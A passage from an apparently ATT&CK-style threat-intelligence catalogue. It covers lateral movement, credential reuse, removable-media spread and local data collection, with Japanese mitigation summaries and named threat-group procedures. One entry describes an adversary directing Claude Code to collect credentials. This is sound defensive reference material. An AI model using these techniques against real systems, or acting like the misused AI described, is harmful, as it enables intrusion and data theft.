ability to list local drives. WhisperGate has the ability to enumerate fixed logical drives on a targeted system. SILENTTRINITY can collect information related to a compromised host, including a list of drives. HermeticWiper can enumerate physical drives on a targeted host. MacMa can collect information about a compromised computer's disk sizes. Mongall can identify drives on compromised hosts. Heyoka Backdoor can enumerate drives on a compromised host. FunnyDream can enumerate all logical drives on a targeted machine. macOS.OSAMiner has checked to ensure there is enough disk space using the Unix utility `df`. MoonWind can obtain the number of drives on the victim machine. Mafalda can enumerate all drives on a compromised host. Woody RAT can retrieve information about storage drives from an infected machine. BlackCat can enumerate local drives. Black Basta can enumerate volumes. Royal can use `GetLogicalDrives` to enumerate logical drives. KOPILUWAK can discover logical drive information on compromised hosts. Sardonic has the ability to collect the C:\ drive serial number from a compromised machine. AsyncRAT can check the disk size through the values obtained with `DeviceInfo.` SharpDisco can use a plugin to enumerate system drives. Ninja can obtain information on physical drives from targeted hosts. DarkGate uses the Delphi methods <code>Sysutils::DiskSize</code> and <code>GlobalMemoryStatusEx</code> to collect disk size and physical memory as part of the malware's anti-analysis checks for running in a virtualized environment. INC Ransomware can discover and mount hidden drives to encrypt them. Nightdoor can collect information about disk drives, their total and free space, and file system type. ROADSWEEP can enumerate logical drives on targeted devices. ZeroCleare can use the `IOCTL_DISK_GET_DRIVE_GEOMETRY_EX`, `IOCTL_DISK_GET_DRIVE_GEOMETRY`, and `IOCTL_DISK_GET_LENGTH_INFO` system calls to compute disk size. SampleCheck5000 can create unique victim identifiers by using the compromised system’s volume ID. LockBit 2.0 can enumerate local drive configuration. LockBit 3.0 can enumerate local drive configuration. PUBLOAD has leveraged `wmic logicaldisk get` to map local network drives. TONESHELL has retrieved the disk serial number of the device using WMI query `SELECT volumeserialnumber FROM win32_logicaldisk where Name =’C:` to identify the victim machine. Qilin has used `GetLogicalDrives()` and `EnumResourceW()` to locate mounted drives and shares. Medusa Ransomware has enumerated logical drives on infected hosts. AshTag can use `volumeserialnumber` to enumerate volumes. DynoWiper has used the Microsoft Windows native `GetLogicalDrives()` and `GetDriveType()` functions to enumerate all the drives visible to the system. 敵対者は、有効なアカウントを用いて、telnet・SSH・VNCなどリモート接続を受け付けるサービスへログインすることがある。その後、ログインユーザーとして操作を実行する。 Adversaries may use Valid Accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. 敵対者は、有効なアカウントを用いてRDPでコンピュータへログインすることがある。Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. 敵対者は、有効なアカウントを用いてSMBのリモート共有（管理共有）を操作することがある。Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. 敵対者は、有効なアカウントを用いてDCOMを悪用しリモートマシンを操作することがある。Adversaries may use Valid Accounts to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. 敵対者は、有効なアカウントを用いてSSHでリモートマシンへログインすることがある。Adversaries may use Valid Accounts to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. 敵対者は、有効なアカウントを用いてVNCでリモートマシンを操作することがある。Adversaries may use Valid Accounts to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network. 敵対者は、有効なアカウントを用いてWinRMでリモートシステムを操作することがある。Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. 敵対者は、侵害環境内でアクセス可能なクラウドサービスへログインすることがある。Adversaries may log into accessible cloud services within a compromised environment using Valid Accounts that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. 敵対者は、有効なアカウントを用いてアクセス可能なクラウドホストへ直接ログインすることがある。Adversaries may leverage Valid Accounts to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the Cloud API, such as Azure Serial Console, AWS EC2 Instance Connect, and AWS System Manager.. アカウントの作成・権限・ライフサイクルを適切に管理する。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ネットワーク越しのリソースアクセスを制限する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 システムやアカウントを監査し、不正な活動を検出する。 リモートサービスに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Wizard Spider has used the WebDAV protocol to execute Ryuk payloads hosted on network file shares. Aquatic Panda used remote scheduled tasks to install malicious software on victim systems during lateral movement actions. Ember Bear uses valid network credentials gathered through credential harvesting to move laterally within victim networks, often employing the Impacket framework to do so. Kivars has the ability to remotely trigger keyboard input and mouse clicks. Stuxnet can propagate via peer-to-peer communication and updates using RPC. MacMa can manage remote screen sessions. Brute Ratel C4 has the ability to use RPC for lateral movement. 敵対者は、企業内に導入された集中型ソフトウェア展開スイートへアクセス・利用し、コマンドを実行してネットワーク内を横展開することがある。 Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. Active Directoryを適切に構成し、攻撃対象領域を縮小する。 ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 重要データをリモートに保管し、破壊・改ざんの影響を軽減する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ソフトウェアのインストールを制限し、不正なプログラム導入を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ソフトウェア展開ツールに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network. Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement. Sandworm Team has used the commercially available tool RemoteExec for agentless remote code execution. APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task. Silence has used RAdmin, a remote software tool used to remotely control workstations and ATMs. Mustang Panda has leveraged legitimate software tools such as AntiVirus Agents, Security Services, and App Development tools to execute scripts and to side-load dlls. Medusa Group has utilized software deployment and management solutions to deploy their encryption payload to include BigFix and PDQ Deploy. VOID MANTICORE has leveraged legitimate built-in features of cloud-based management platforms to include mobile device management (MDM) and Remote Monitoring and Management (RMM) solutions. VOID MANTICORE has also initiated built-in remote wipe instructions using a privileged account within Microsoft Intune. It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the Wiper malware. 敵対者は、ネットワークドライブや内部コードリポジトリなどの共有ストレージにコンテンツを追加することで、リモートシステムへペイロードを配送することがある。 Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 許可されていないコードの実行を防止する。 アンチウイルス/アンチマルウェアで悪意あるコードを検出・防止する。 エクスプロイト保護機能で脆弱性悪用を防ぐ。 共有コンテンツの汚染に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Darkhotel used a virus that propagates by infecting executables stored on shared drives. Gamaredon Group has injected malicious macros into all Word and Excel documents on mapped network drives. BRONZE BUTLER has placed malware on file shares and given it the same name as legitimate documents on the share. Cinnamon Tempest has deployed ransomware from a batch file in a network share. RedCurl has placed modified LNK files on network drives for lateral movement. H1N1 has functionality to copy itself to network shares. Miner-C copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file. InvisiMole can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network. Ursnif has copied itself to and infected files in network drives for propagation. Ramsay can spread itself by infecting other portable executable files on networks shared drives. Conti can spread itself by infecting other remote machines via network shared drives. Stuxnet infects remote servers via network shares and by infecting WinCC database views with malicious code. 敵対者は、マルウェアをリムーバブルメディアにコピーしAutorunを悪用することで、切断された／エアギャップされたネットワークのシステムへ移動することがある。 Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. ハードウェアの接続を制限し、不正な機器の導入を防ぐ。 エンドポイントで悪意ある挙動を検出・防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 リムーバブルメディア経由の複製に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT28 uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted. Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers. FIN7 actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations. Additionally, FIN7 has used malicious USBs that acted as virtual keyboards to install malware and txt files that decode to PowerShell commands. Gamaredon Group has replicated to removable media by leveraging the User Assist Reg Key and creating LNKs on all network and removable drives available on the infected host. Tropic Trooper has attempted to transfer USBferry from an infected USB device by copying an Autorun function to the target machine. Mustang Panda has used a customized PlugX variant which could spread through USB connections. Aoqin Dragon has used a dropper that employs a worm infection strategy using a removable device to breach a secure network environment. LuminousMoth has used malicious DLLs to spread malware to connected removable USB drives on infected machines. PlugX has copied itself to infected removable drives for propagation to other victim devices. Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic. APT30 may have used the SHIPSHAPE malware to move onto air-gapped networks. SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document. DustySky searches for removable media and duplicates itself onto it. Agent.btz drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware. Crimson can spread across systems by infecting removable media. Unknown Logger is capable of spreading to USB devices. H1N1 has functionality to copy itself to removable media. USBStealer drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system. Flame contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality. njRAT can be configured to spread via removable drives. Ursnif has copied itself to and infected removable drives for propagation. USBferry can copy its installer to attached USB storage devices. Ramsay can spread itself by infecting other portable executable files on removable drives. Stuxnet can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability. Conficker variants used the Windows AUTORUN feature to spread through USB propagation. QakBot has the ability to use removable drives to spread through compromised networks. ANDROMEDA has been spread via infected USB keys. Raspberry Robin has historically used infected USB media to spread to new victims. HIUPAN has periodically checked for removable and hot-plugged drives connected to the infected machine, should one be found HIUPAN will propagate to the removeable drives by copying itself and accompanying malware components to a directory to the new drive in a hidden subdirectory `<Drive_Letter>:\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\` and hides any other existing files to ensure UsbConfig.exe is the only visible file on the device. 敵対者は、ネットワーク内に侵入後、リモートサービスの脆弱性を悪用して内部システムへ不正アクセスすることがある。 Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. 脆弱性スキャンを実施し、悪用され得る弱点を事前に特定・修正する。 脅威インテリジェンスを活用し、対象となる脅威アクターのTTPを把握する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ネットワークを分割し、横展開や影響範囲を限定する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 アプリを分離・サンドボックス化し、影響範囲を限定する。 エクスプロイト保護機能で脆弱性悪用を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 リモートサービスの脆弱性悪用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement. Threat Group-3390 has exploited MS17-010 to move laterally to other systems on the network. Dragonfly has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers. menuPass has used tools to exploit the ZeroLogon vulnerability (CVE-2020-1472). FIN7 has exploited ZeroLogon (CVE-2020-1472) against vulnerable domain controllers. MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472). Wizard Spider has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities. Fox Kitten has exploited known vulnerabilities in remote services including RDP. Tonto Team has used EternalBlue exploits for lateral movement. Ember Bear has used exploits for vulnerabilities such as MS17-010, also known as `Eternal Blue`, during operations. Earth Lusca has used Mimikatz to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472). Flame can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally. InvisiMole can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively. TrickBot utilizes EternalBlue and EternalRomance exploits for lateral movement in the modules wormwinDll, wormDll, mwormDll, nwormDll, tabDll. Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers. WannaCry uses an exploit in SMBv1 to spread itself to other remote systems on a network. Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation. NotPetya can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network. PoshC2 contains a module for exploiting SMB via EternalBlue. Lucifer can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144). Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities. Bad Rabbit used the EternalRomance SMB exploit to spread through victim networks. Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request. QakBot can move laterally using worm-like functionality through exploitation of SMB. 敵対者は、環境内のアカウントやシステムへ既にアクセスした後、内部スピアフィッシングを用いて追加のアクセスを得ることがある。内部からの送信は信頼されやすい。 After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating Impersonation. 内部スピアフィッシングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization. Gamaredon Group has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization. Leviathan has conducted internal spearphishing within the victim's environment for lateral movement. MuddyWater has used compromised mailboxes within target organizations to send spearphishing emails. Kimsuky has sent internal spearphishing emails for lateral movement after stealing victim information. APT-C-36 has used a compromised account to send a phishing email to an address likely used and monitored by the IT team within the same targeted organization. HEXANE has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access. SameCoin can send its Setup.exe file as an attachment to other addresses in the same compromised organization. 敵対者は、パスワードハッシュ・Kerberosチケット・アプリアクセストークンなどの代替認証材料を用いて横展開し、通常のシステムアクセス制御を回避することがある。 Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 敵対者は、窃取したアプリアクセストークンを用いて通常の認証を回避することがある。Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. 敵対者は、窃取したパスワードハッシュで「パス・ザ・ハッシュ」を行い横展開することがある。Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. 敵対者は、窃取したKerberosチケットで「パス・ザ・チケット」を行い横展開することがある。Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. 敵対者は、窃取したセッションクッキーでWebアプリへ認証することがある。Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 Active Directoryを適切に構成し、攻撃対象領域を縮小する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 ログイン試行回数やロックアウト等のアカウント使用ポリシーを設定する。 システムやアカウントを監査し、不正な活動を検出する。 代替認証材料の使用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 used forged SAML tokens that allowed the actors to impersonate users and bypass MFA, enabling APT29 to access enterprise cloud applications and services. FoggyWeb can allow abuse of a compromised AD FS server's SAML token. 敵対者は、リモートサービスの既存セッションを乗っ取って環境内を横展開することがある。正規ユーザーのSSH・RDPセッションが対象となりうる。 Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service. 敵対者は、正規ユーザーのSSHセッションを乗っ取って横展開することがある。Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair. 敵対者は、正規ユーザーのリモートデスクトップセッションを乗っ取って横展開することがある。Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 ネットワークを分割し、横展開や影響範囲を限定する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 リモートサービスセッションの乗っ取りに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、侵害環境内のシステム間でツールやファイルを転送することがある。外部から持ち込んだ後、内部で横方向に展開する。 Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., Ingress Tool Transfer) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 横展開ツール転送に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Wocao, threat actors used SMB to copy files to and from target systems. During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network. During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy. During the 2016 Ukraine Electric Power Attack, Sandworm Team used `move` to transfer files to a network share. During the 2015 Ukraine Electric Power Attack, Sandworm Team moved their tools laterally within the corporate network and between the ICS and corporate network. During the 2022 Ukraine Electric Power Attack, Sandworm Team used a Group Policy Object (GPO) to copy CaddyWiper's executable `msserver.exe` from a staging server to a local hard drive before deployment. During HomeLand Justice, threat actors initiated a process named Mellona.exe to spread the ROADSWEEP file encryptor and a persistence script to a list of internal machines. During SharePoint ToolShell Exploitation, threat actors used Impacket to remotely stage and execute payloads via WMI. During the 2025 Poland Wiper Attacks, the adversaries had placed the malicious payload on an accessible network share to facilitate propagation. Turla RPC backdoors can be used to transfer files to/from victim machines on the local network. Sandworm Team has used `move` to transfer files to a network share and has copied payloads--such as Prestige ransomware--to an Active Directory Domain Controller and distributed via the Default Domain Group Policy Object. Additionally, Sandworm Team has transferred an ISO file into the OT network to gain initial access. APT32 has deployed tools after moving laterally using administrative accounts. FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally. Magic Hound has copied tools within a compromised network using RDP. GALLIUM has used PsExec to move laterally between hosts in the target network. APT41 uses remote shares to move and remotely execute payloads during lateral movemement. Wizard Spider has used stolen credentials to copy tools into the <code>%TEMP%</code> directory of domain controllers. Chimera has copied tools between compromised hosts using SMB. Ember Bear retrieves follow-on payloads direct from adversary-owned infrastructure for deployment on compromised hosts. Aoqin Dragon has spread malware in target networks by copying modules to folders masquerading as removable devices. Volt Typhoon has copied web shells between servers in targeted environments. Agrius downloaded some payloads for follow-on execution from legitimate filesharing services such as <code>ufile.io</code> and <code>easyupload.io</code>. INC Ransom has used a rapid succession of copy commands to install a file encryption executable across multiple endpoints within compromised infrastructure. BlackByte transfered tools such as Cobalt Strike and the AnyDesk remote access tool during operations using SMB shares. Storm-1811 has used the Impacket toolset to move and remotely execute payloads to other hosts in victim networks. Velvet Ant transferred files laterally within victim networks through the Impacket toolkit. UNC3886 has utilzed Python scripts to transfer files between ESXi hosts and guest VMs. Medusa Group has utilized legitimate software services such as PDQ Deploy to transfer malicious binaries and tools to other victimized hosts within the target environment. PsExec can be used to download or upload a file over a network share. DustySky searches for network drives and removable media and duplicates itself onto them. ftp may be abused by adversaries to transfer tools or files between systems within a compromised environment. cmd can be used to copy files to/from a remotely connected internal system. Shamoon attempts to copy itself to remote machines on the network. BITSAdmin can be used to create BITS Jobs to upload and/or download files from SMB file servers. Impacket has used its `wmiexec` command, leveraging Windows Management Instrumentation, to remotely stage and execute payloads in victim networks. Expand can be used to download or upload a file over a network share. Olympic Destroyer attempts to copy itself to remote machines on the network. WannaCry attempts to copy itself to remote computers after gaining access via an SMB exploit. Emotet has copied itself to remote systems using the `service.exe` filename. LockerGoga has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating. esentutl can be used to copy files to/from a remote share. Operators deploying Netwalker have used psexec to copy the Netwalker payload across accessible systems. Lucifer can use certutil for propagation on Windows hosts within intranets. Stuxnet uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network. HermeticWizard can copy files to other machines on a compromised network. OutSteel can download the Saint Bot malware for follow-on execution. BlackCat can replicate itself across connected servers via `psexec`. IPsec Helper can download additional payloads from command and control nodes and execute them. INC Ransomware can push its encryption executable to multiple endpoints within compromised infrastructure. BlackByte Ransomware spreads itself laterally by writing the JavaScript launcher file to mapped shared folders. VIRTUALPITA is capable of file transfer and arbitrary command execution. VIRTUALPIE has file transfer capabilities. Havoc has the ability to copy files from one location to another. Qilin has used PsExec to distribute a second encryptor, named encryptor_1.exe, across the targeted environment. SameCoin can copy its wiper executable to remote machines within the same Active Directory. 敵対者は、ローカルシステム上の機密データを探索・収集して持ち出しに備えることがある。 Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration. DLPでデータの不正な持ち出しを検出・防止する。 ローカルシステムからのデータに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors used Empire to gather various local system information. During Night Dragon, the threat actors collected files and other data from compromised systems. During CostaRicto, the threat actors collected data and files from compromised networks. During Operation Honeybee, the threat actors collected data from compromised hosts. During Operation CuckooBees, the threat actors collected data, files, and other information from compromised networks. During Operation Wocao, threat actors exfiltrated files and directories of interest from the targeted system. During C0015, the threat actors obtained files and data from the compromised network. During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks. During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host. During the SolarWinds Compromise, APT29 extracted files from compromised networks. During C0026, the threat actors collected documents from compromised hosts. During Cutting Edge, threat actors stole the running configuration and cache data from targeted Ivanti Connect Secure VPNs. During Operation MidnightEclipse, threat actors stole saved cookies and login data from targeted systems. During SharePoint ToolShell Exploitation, threat actors extracted information from the compromised systems. During the Anthropic AI-orchestrated Campaign, the adversary tasked Claude Code to automatically gather sensitive data stored within the local system to include credentials, system configurations and sensitive operational data. Axiom has collected data from a compromised network. Ke3chang gathered information and files from local directories for exfiltration. APT1 has collected files from a local victim. APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration. Turla RPC backdoors can upload files from victim machines. APT29 has stolen data from compromised hosts. APT3 will identify Microsoft Office documents on the victim's computer. Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories. Lazarus Group has collected data and files from compromised networks. Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts. Dragonfly has collected data from local victim systems. FIN6 has collected and exfiltrated payment card data from compromised systems. Stealth Falcon malware gathers data from the local victim system. Patchwork collected and exfiltrated files from the infected system. menuPass has collected various files from the compromised computers. FIN7 has collected files and other sensitive information from a compromised network. Gamaredon Group has collected files from infected systems and uploaded them to a C2 server. OilRig has used PowerShell to upload files from compromised systems. Magic Hound has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine. BRONZE BUTLER has exfiltrated files stolen from local systems. APT37 has collected data from victims' local systems. Dark Caracal collected complete contents of the 'Pictures' folder from compromised Windows systems. APT38 has collected data from a compromised host. APT39 has used various tools to steal files from the compromised host. GALLIUM collected data from the victim's local system, including password hashes from the SAM hive in the Registry. Kimsuky has collected Office, PDF, and HWP documents from its victims. Kimsuky has also harvested victim files through the use of the `RecentFiles()` function that collects paths of recently accessed files by parsing .lnk shortcuts from `%APPDATA%\Microsoft\Windows\Recent`. APT41 has uploaded files and data from a compromised host. Inception used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host. Wizard Spider has collected data from a compromised host prior to exfiltration. Fox Kitten has searched local system resources to access sensitive documents. Windigo has used a script to gather credentials in files left on disk by OpenSSH backdoors. HAFNIUM has collected data and files from a compromised machine. Andariel has collected large numbers of files from compromised network systems for later extraction. Aquatic Panda captured local Windows security event log data from victim machines using the <code>wevtutil</code> utility to extract contents to an <code>evtx</code> output file. Ember Bear gathers victim system information such as enumerating the volume of a given device or extracting system and security event logs for analysis. LAPSUS$ uploaded sensitive files, information, and credentials from a targeted organization for extortion or public release. CURIUM has exfiltrated data from a compromised machine. LuminousMoth has collected files and data from compromised machines. FIN13 has gathered stolen credentials, sensitive data such as point-of-sale (POS), and ATM data from a compromised network before exfiltration. Volt Typhoon has stolen files from a sensitive file server and the Active Directory database from targeted environments, and used Wevtutil to extract event log information. ToddyCat has run scripts to collect documents from targeted hosts. Agrius gathered data from database and other critical servers in victim environments, then used wiping mechanisms as an anti-analysis and anti-forensics mechanism. RedCurl has collected data from the local disk of compromised hosts. MirrorFace gathered data and files of interest from victim's systems. VOID MANTICORE has collected cached data and files from within the victim environment. Hikit can upload files from compromised machines. Taidoor can upload data and files from a victim's machine. PoisonIvy creates a backdoor through which remote attackers can steal system information. Ixeshe can collect data from a local system. China Chopper's server component can upload local files. Uroburos can use its `Get` command to exfiltrate specified files from the compromised system. FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on the local system. FLASHFLOOD will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. FLASHFLOOD also collects information stored in the Windows Address Book. PinchDuke collects user files from the compromised host based on predefined file extensions. CosmicDuke steals user files from local hard drives with file extensions that match a predefined list. MobileOrder exfiltrates data collected from the victim mobile device. Misdat has collected files and data from a compromised host. Mis-Type has collected files and data from a compromised host. Rover searches for files on local drives based on a predefined list of file extensions. Crimson can collect information from a compromised host. When it first starts, BADNEWS crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt. Cobalt Strike can collect data from a local system. RawPOS dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data. Forfiles can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before). PowerSploit contains a collection of Exfiltration modules that can access data from local files, volumes, and processes. PUNCHTRACK scrapes memory for properly formatted payment card data. Hydraq creates a backdoor through which remote attackers can read data from files. Pasam creates a backdoor through which remote attackers can retrieve files. Linfo creates a backdoor through which remote attackers can obtain data from local systems. POWERSTATS can upload files from compromised hosts. Bandook can collect local files from the system . GravityRAT steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf. Proxysvc searches the local system and gathers data. Bankshot collects files from the local system. ROKRAT can collect host data and specific file types. yty collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, 